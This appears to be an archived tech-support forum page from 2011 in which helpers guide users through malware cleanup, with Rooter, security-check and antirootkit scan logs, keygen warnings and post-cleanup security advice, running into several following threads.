C:\ [Fixed-NTFS] .. ( Total:232 Go - Free:117 Go )
D:\ [CD_Rom]
E:\ [CD_Rom]
F:\ [CD_Rom]
.
Scan : 20:32.44
Path : C:\Users\Jermaine\Desktop\Rooter.exe
User : Jermaine ( Administrator -> YES )
.
----------------------\\ Processes
.
Locked [System Process] (0)
Locked System (4)
______ ??–? (240)
______ ??–? (384)
______ ??–? (456)
______ ??–? (476)
______ ??–? (516)
______ ??–? (560)
______ ??–? (576)
______ ??–? (584)
______ ??–? (700)
______ ??–? (764)
______ ??–? (804)
______ ??–? (868)
______ ??–? (944)
______ ??–? (976)
______ C:\Program Files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe (1008)
______ ??–? (716)
______ ??–? (1096)
______ ??–? (1164)
______ ??–? (1176)
______ ??–? (1372)
______ ??–? (1396)
______ ??–? (1508)
______ ??–? (1520)
______ ??–? (1568)
______ ??–? (1644)
______ C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe (1764)
______ C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (1808)
______ ??–? (1880)
______ C:\Program Files (x86)\IObit\Advanced SystemCare 3\AWC.exe (1980)
______ ??–? (2036)
______ C:\Program Files (x86)\TeamViewer\Version6\TeamViewer_Service.exe (1284)
______ ??–? (1260)
______ ??–? (2076)
______ ??–? (2160)
______ ??–? (2168)
______ ??–? (2176)
______ ??–? (2252)
______ C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe (2588)
______ C:\Program Files (x86)\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe (2636)
______ ??–? (2676)
______ ??–? (2960)
______ ??–? (2364)
______ ??–? (2620)
______ C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe (2788)
Locked audiodg.exe (3208)
______ ??–? (2304)
______ ??–? (1960)
______ C:\Windows\SysWOW64\Macromed\Flash\FlashUtil10q_ActiveX.exe (248)
______ ??–? (2416)
______ C:\Users\Jermaine\Desktop\Rooter.exe (2792)
.
----------------------\\ Device\Harddisk0\
.
\Device\Harddisk0 [Sectors : 63 x 512 Bytes]
.
\Device\Harddisk0\Partition1 --[ MBR ]-- (Start_Offset:1048576 | Length:250057064448)
.
----------------------\\ Scheduled Tasks
.
C:\Windows\Tasks\AWC AutoSweep.job
C:\Windows\Tasks\AWC Startup.job
C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
C:\Windows\Tasks\SA.DAT
C:\Windows\Tasks\SCHEDLGU.TXT
.
----------------------\\ Registry
.
.
----------------------\\ Files & Folders
.
C:\Users\Jermaine\Downloads\half-life\Half-Life_CD_Keygen\Half Life CDkeygen.exe
==> Cracks & Keygens <==
.
----------------------\\ Scan completed at 20:32.57
.
C:\Rooter$\Rooter_1.txt - (27/05/2011 | 20:32.57).c
Your computer has keygens, which is a form of software piracy. What is so bad about Cracks, Hacks, Pirated software, warez, or Keygens?

Most popular cracks or keygens I see, are for Adobe CS3, a lot of different games, Nero, Kaspersky antivirus, and much more. All of these cracks and keygens have what is called "cloaked malware," which is a form of spyware or VIRUSES or trojans that hide themselves inside the keygen or crack files. Most hacks for games that come in the form of a program or installer, will also be infected. It is the opportunity for attackers to present a seemingly safe situation where the opportunity to steal something is in play, while the malware infects your system in the process. Yes, it will install what you were looking for, but also allow malware to potentially take control of your computer.

Lastly, it is illegal. I will counsel you that we do not report such incidents. However, it is not good practice to pirate software.
Downloads\half-life\Half-Life_CD_Keygen
**************************************************************
I'd like to scan your machine with ESET OnlineScan

•Hold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScan
•Click the button.
•For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the icon on your desktop.
•Check
•Click the button.
•Accept any security warnings from your browser.
•Check
•Push the Start button.
•ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
•When the scan completes, push
•Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
•Push the button.
•Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt
Quote from: SuperDave on May 28, 2011, 01:00:51 PM
Your computer has keygens, which is a form of software piracy. What is so bad about Cracks, Hacks, Pirated software, warez, or Keygens?

Most popular cracks or keygens I see, are for Adobe CS3, a lot of different games, Nero, Kaspersky antivirus, and much more. All of these cracks and keygens have what is called "cloaked malware," which is a form of spyware or viruses or trojans that hide themselves inside the keygen or crack files. Most hacks for games that come in the form of a program or installer, will also be infected. It is the opportunity for attackers to present a seemingly safe situation where the opportunity to steal something is in play, while the malware infects your system in the process. Yes, it will install what you were looking for, but also allow malware to potentially take control of your computer.

Lastly, it is illegal. I will counsel you that we do not report such incidents. However, it is not good practice to pirate software.
Downloads\half-life\Half-Life_CD_Keygen
**************************************************************
I'd like to scan your machine with ESET OnlineScan

•Hold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScan
•Click the button.
•For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the icon on your desktop.
•Check
•Click the button.
•Accept any security warnings from your browser.
•Check
•Push the Start button.
•ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
•When the scan completes, push
•Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
•Push the button.
•Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt

When i try to use this it tries to update then it say's that it "cannot get the update, is proxy configured?"nevermind i got it to work, but it didnt find anything... so no log.Good. If there are no other issues, we can do some cleanup.

To remove all of the tools we used and the files and folders they created do the following:
Double click OTL.exe.
  • Click the CleanUp button.
  • SELECT Yes when the "Begin cleanup Process?" prompt appears.
  • If you are prompted to Reboot during the cleanup, select Yes.
  • The tool will delete itself once it finishes.
Note: If any tool, file or folder (belonging to the program we have used) hasn't been deleted, please delete it manually.
************************************************************
To set a new Restore Point.

Click Start button , click Control Panel, click System and Maintenance, and then clicking System. In the left pane, click System Protection. If you are prompted for an administrator password or confirmation, type the password or provide confirmation. To turn off System Protection for a hard disk, clear the check box next to the disk, and then click OK. Reboot to Normal Mode.
Click the Start button , click Control Panel, click System and Maintenance, and then click System.
In the left pane, click System Protection. If you are prompted for an administrator password or confirmation, type the password or provide confirmation.
To turn on System Protection for a hard disk, select the check box next to the disk, and then click OK.
This will give you a new, clean Restore Point.
******************************************************************
Clean out your temporary internet files and temp files.

Download TFC by OldTimer to your desktop.

Double-click TFC.exe to run it.

Note: If you are running on Vista, right-click on the file and choose Run As Administrator

TFC will close all programs when run, so make sure you have saved all your work before you begin.

* Click the Start button to begin the cleaning process.
* Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two.
* Please let TFC run uninterrupted until it is finished.

Once TFC is finished it should restart your computer. If it does not, please manually restart the computer yourself to ensure a complete cleaning.
************************************************************
Looking over your log it seems you don't have any evidence of a third party firewall.

Firewalls protect against hackers and malicious intruders. You need to download a free firewall from one of these reliable vendors.

Remember only install ONE firewall

1) Comodo Personal Firewall (Uncheck during installation "Install Comodo SafeSurf..", Make Comodo my default search provider" and "Make Comodo Search my homepage" and uncheck any HopSurf and/or Ask.com options if you choose this one)
2) Online Armor
3) Agnitum Outpost
4) PC Tools Firewall Plus

If you are using the built-in Windows XP firewall, it is not recommended as it does not block outgoing connections. This means that any malware on your computer is free to "phone home" for more instructions. Simply put, Windows XP contains a mediocre firewall. This firewall is NO replacement for a dedicated software solution. Remember to use only one firewall at the same time.
***************************************************************
Use the Secunia Software Inspector to check for out of date software.

•Click Start Now

•Check the box next to Enable thorough system inspection.

•Click Start

•Allow the scan to finish and scroll down to see if any updates are needed.
•Update anything LISTED.
.
----------

Go to Microsoft Windows Update and get all critical updates.

----------

I suggest using WOT - Web of Trust. WOT is a free Internet security addon for your browser. It will keep you safe from online scams, identity theft, spyware, spam, viruses and unreliable shopping sites. WOT warns you before you interact with a risky website. It's easy and it's free.

SpywareBlaster- Secure your Internet Explorer to make it harder for ActiveX programs to run on your computer. Also stop certain cookies from being added to your computer when running Mozilla based browsers like Firefox.
* Using SpywareBlaster to protect your computer from Spyware and Malware
* If you don't know what ActiveX controls are, see here

Protect yourself against spyware using the Immunize feature in Spybot - Search & Destroy. Guide: Use Spybot's Immunize Feature to prevent spyware infection in real-time. Note: To ensure you have the latest Immunizations always update Spybot - Search & Destroy before Immunizing. Spybot - Search & Destroy FAQ

Check out Keeping Yourself Safe On The Web for tips and free tools to help keep you safe in the future.

Also see Slow Computer? It may not be Malware for free cleaning/maintenance tools to help keep your computer running smoothly.
Safe Surfing!
Sorry but the issue has still not been resolved. Microsoft Secrurity Essentials is still not monitoring my system, and Windows Defender still dont start. This is due to the VIRUS that i got that you helped me remove. It might be the damage that it left but is there anyway i can fix these issues.

Note: When i try to open windows Defender it gives me the same message as the picture in post #2

Thanks for what you've dome but i still need some more help.I don't have Windows 7 so I've never had a chance to try this.

Open the Windows Update troubleshooter by clicking the Start button , and then clicking Control Panel. In the search box, type troubleshooter, and then click Troubleshooting. Under System and Security, click Fix problems with Windows Update. These errors can happen if your computer runs out of memory while installing an update. If the Windows Update troubleshooter didn't fix the problem, try the following:

•Close all programs, including ones that run in the background, such as firewalls, antispyware software, web accelerators, Internet security or antivirus programs, or proxy servers, and then run Windows update again.

If you turned off your firewall, antivirus, or other security programs, turn them on once the update has been installed. You can restart any other programs you closed, as well. This error will also occur if the system is out of memory.

There is also a program on Windows 7 called Action Center You can learn more about by clicking the link.

This problem is because BITS is not running. Here's a link that may help analyze and fix this problemFixed!

Steps To fix it according to SuperDave:

1: Remove Viruses
2: Enforce Security
3:Fix Problems

I'm going to add two more steps that i did to completely fix it.

4: After Fixes, Run Windows Defender
5: Uninstall and reinstall Microsoft Security Essentials

And Done, Everything works and I have enforced Security.

Thanks SuperDave For all the for all the help, Hope this will help other people that encounder this problem.

Note: Can a Moderator rename this to "Security Center service keeps disabeling"? So it comes up on serch engines.Quote
I'm going to add two more steps that i did to completely fix it.

4: After Fixes, Run Windows Defender
5: Uninstall and reinstall Microsoft Security Essentials

And Done, Everything works and I have enforced Security.
Great. Good moves.
Quote
Can a Moderator rename this to "Security Center service keeps disabeling"? So it comes up on serch engines.
It's already named although I don't recommend anyone to follow this cleaning guide. It was created for your computer and could have adverse effects on another computer. Also, some programs are very powerful and if not used correctly, could permanently damage a computer.
Quote
Fixed!
I'm curious. Which method in Reply # 22 did the trick so I'll know the next time I encounter this.

Quote
Thanks SuperDave For all the for all the help
You're welcome. Quote from: SuperDave on May 30, 2011, 04:53:24 PM
Great. Good moves.It's already named although I don't recommend anyone to follow this cleaning guide. It was created for your computer and could have adverse effects on another computer. Also, some programs are very powerful and if not used correctly, could permanently damage a computer. I'm curious. Which method in Reply # 22 did the trick so I'll know the next time I encounter this.
You're welcome.

Actually None If the things metioned in post #22 (directly) helped but aided it.

For example, if you didnt get my computer cleaned It wouldnt be able to turn on Windows Defender. And for me to by pass the Service issue for Microsoft Security Essentials (telling me it needed a service turned on), I had to reinstall the whole program again. The reinstall probably reinstalled the service Microsoft Security Essentials needed.Thanks. I will lock this thread. If you need it re-opened, please send me a pm.
Discussion
3271.

Solve : Is patch.exe harmful??

Answer»

Quote from: SuperDave on May 30, 2011, 05:48:05 PM


SpywareBlaster, ThreatFire etc. to catch the spyware and rogues. You should conside keeping SAS and MBAM on your COMPUTER. Update them and run them on a regular basis. Here's some good advice.
I do have MBAM and run it weekly. Will keep SAS and check into ThreatFire. Also have SpywareBlaster after my last problem.

How did I get infected?
Will go read right now. This was a first for me....sure don't want it to happen again!Quote
This was a first for me....sure don't want it to happen again!
If you follow all the directions provided, you should be OK. I will LOCK this thread. If you NEED it re-opened, please send me a pm.
Discussion
3272.

Solve : Adobe flash player security pop up window?

Answer»

Im getting a POP up window that says something to the effect of,

"Adobe flash player security.. STOPPED potentially unsafe operation
Vitamin.networldsmedia.net

Click settings"

Sorry for the incomplete message. I TRIED to copy and past the message but It didn't work so Im going off of memory and what I had typed into my iphone google.

Any idea what this is and how i might fix it?

THANKS!
JONE post per question is enough. I'm locking this thread.
Discussion
3273.

Solve : virus causing programs to be unusable?

Answer»

Results of screen317's Security Check version 0.99.8
Windows XP Service Pack 2
Out of date service pack!!
Internet Explorer 8
``````````````````````````````
Antivirus/Firewall Check:
Windows Firewall Disabled!
Norton 360
```````````````````````````````
Anti-MALWARE/Other Utilities Check:
Malwarebytes' Anti-Malware
Java(TM) 6 Update 13
Out of date Java installed!
Adobe Flash Player 10.0.42.34
Adobe Reader 9.1
Out of date Adobe Reader installed!
Mozilla Firefox (3.5.16) Firefox Out of Date!
````````````````````````````````
Process Check:
objlist.exe by Laurent
Norton ccSvcHst.exe
``````````End of Log````````````





SysProt AntiRootkit v1.0.1.0
by swatkat

******************************************************************************************
******************************************************************************************

No Hidden Processes found

******************************************************************************************
******************************************************************************************
Kernel Modules:
Module Name: SYMEFA.SYS
Service Name: SymEFA
Module Base: F73FD000
Module End: F744C000
Hidden: Yes

Module Name: \SystemRoot\System32\Drivers\dump_atapi.sys
Service Name: ---
Module Base: ED46F000
Module End: ED487000
Hidden: Yes

Module Name: \SystemRoot\System32\Drivers\dump_WMILIB.SYS
Service Name: ---
Module Base: F7BA4000
Module End: F7BA6000
Hidden: Yes

******************************************************************************************
******************************************************************************************
SSDT:
Function Name: ZwConnectPort
Address: 864AC1F8
Driver Base: 0
Driver End: 0
Driver Name: _unknown_

Function Name: ZwCreateThread
Address: 86665478
Driver Base: 0
Driver End: 0
Driver Name: _unknown_

Function Name: ZwLoadDriver
Address: 864427C0
Driver Base: 0
Driver End: 0
Driver Name: _unknown_

Function Name: ZwResumeThread
Address: 8637FA98
Driver Base: 0
Driver End: 0
Driver Name: _unknown_

******************************************************************************************
******************************************************************************************
No Kernel Hooks found

******************************************************************************************
******************************************************************************************
Hidden files/folders:
Object: C:\Documents and Settings\All Users\Application Data\Brother\BrLog\BrCollectDir\BR_cat.bat
Status: Access denied

Object: C:\Documents and Settings\All Users\Application Data\Brother\BrLog\BrCollectDir\BR_Compress_20080612_170148_1_1
Status: Access denied

Object: C:\Documents and Settings\All Users\Application Data\Brother\BrLog\BrCollectDir\BR_PC_CHK.txt
Status: Access denied

Object: C:\Documents and Settings\All Users\Application Data\Brother\BrLog\BrCollectDir\Progress_log_Compress.txt
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\AcroForm\MRUFormsList
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\AcroForm
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\AdobeComFnt06.lst
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\Collab\OfflineDocs
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\Collab\Reviews
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\Collab
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\eBooks
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\JSADM.exv
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\Messages\ENU\read0600win_ENUadbe000y.pdf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\Messages\ENU
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\Messages
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\Preferences\AutoFillDefaults.dat
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\Preferences\defaultHeuristics.dat
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\Preferences
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\TMGrpPrm.sav
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\Updater\udstore.js
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0\Updater
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat\6.0
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Acrobat
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Flash Player\AssetCache\HEX9SQLJ\1846548181EAE8A4BB86AFC74FD021D9A0F6DFA6.heu
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Flash Player\AssetCache\HEX9SQLJ\1846548181EAE8A4BB86AFC74FD021D9A0F6DFA6.swz
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Flash Player\AssetCache\HEX9SQLJ\cacheSize.txt
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Flash Player\AssetCache\HEX9SQLJ
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Flash Player\AssetCache
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe\Flash Player
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Adobe
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\AdobeUM
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\desktop.ini
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Google\Local Search History\google%2Emaps.w
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Google\Local Search History\google%2Eweb.w
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Google\Local Search History
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Google
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Hamachi\Chat Logs
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Hamachi\client.id
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Hamachi\client.pri
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Hamachi\client.pub
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Hamachi\hamachi.ini
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Hamachi\Networks
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Hamachi\peers.ini
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Hamachi\RSA Keys\5.240.77.114.pub
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Hamachi\RSA Keys\5.36.119.27.pub
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Hamachi\RSA Keys
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Hamachi
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Identities\{DA85A781-721C-49D8-9E19-EF4A2E552F3B}
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Identities
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Intuit\Quicken\Config
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Intuit\Quicken\Data
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Intuit\Quicken
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Intuit
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\adcontent.videoegg.com\com.quantserve.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\adcontent.videoegg.com\EAPUSER.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\adcontent.videoegg.com\vepui.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\adcontent.videoegg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\as1.suitesmart.com\6thElement.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\as1.suitesmart.com\_f5e.swf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\as1.suitesmart.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com\static.video.yahoo.com\yep\vyc_player.swf\yep_player.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com\static.video.yahoo.com\yep\vyc_player.swf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com\static.video.yahoo.com\yep\YV_YEP.swf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com\static.video.yahoo.com\yep
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com\static.video.yahoo.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com\VolumePrefs.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com\YEPBWPrefs.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\e.blip.tv\com.quantserve.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\e.blip.tv
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\flash.quantserve.com\com.quantserve.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\flash.quantserve.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\googleads.g.doubleclick.net\pagead\googleadplayer.swf\mediaPlayerUserSettings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\googleads.g.doubleclick.net\pagead\googleadplayer.swf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\googleads.g.doubleclick.net\pagead
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\googleads.g.doubleclick.net
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\illumenix.com\StreamMinerInfo.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\illumenix.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\interclick.com\ud.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\interclick.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-\flash\promotions\us\general_motors\081113\container.swf\swfCounter.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-\flash\promotions\us\general_motors\081113\container.swf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-\flash\promotions\us\general_motors\081113
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-\flash\promotions\us\general_motors
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-\flash\promotions\us
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-\flash\promotions
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-\flash
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\login.yahoo.com\loginCache.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\login.yahoo.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\macromedia.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.podaddies.com\podaddies_user_data.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.podaddies.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.scanscout.com\SS_ARE_BrandAdHistory.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.scanscout.com\SS_ARE_CampaignHistory.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.scanscout.com\SS_ARE_CatFreqHist.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.scanscout.com\SS_ARE_DayFreqCap.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.scanscout.com\SS_ARE_RPCAdHistory.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.scanscout.com\SS_ARE_UserData.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.scanscout.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\pic.wretch.cc\e\serv\video\video_player\TransPlayer_20081101.swf\volume.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\pic.wretch.cc\e\serv\video\video_player\TransPlayer_20081101.swf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\pic.wretch.cc\e\serv\video\video_player
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\pic.wretch.cc\e\serv\video
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\pic.wretch.cc\e\serv
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\pic.wretch.cc\e
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\pic.wretch.cc
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\s.ytimg.com\moduleData.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\s.ytimg.com\soundData.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\s.ytimg.com\videostats.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\s.ytimg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\skype.com\#ui\preferences.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\skype.com\#ui
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\skype.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\static.youku.com\youkuqplayer.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\static.youku.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\tubemogul.com\InPlayCounts.sol
Status: Access denied

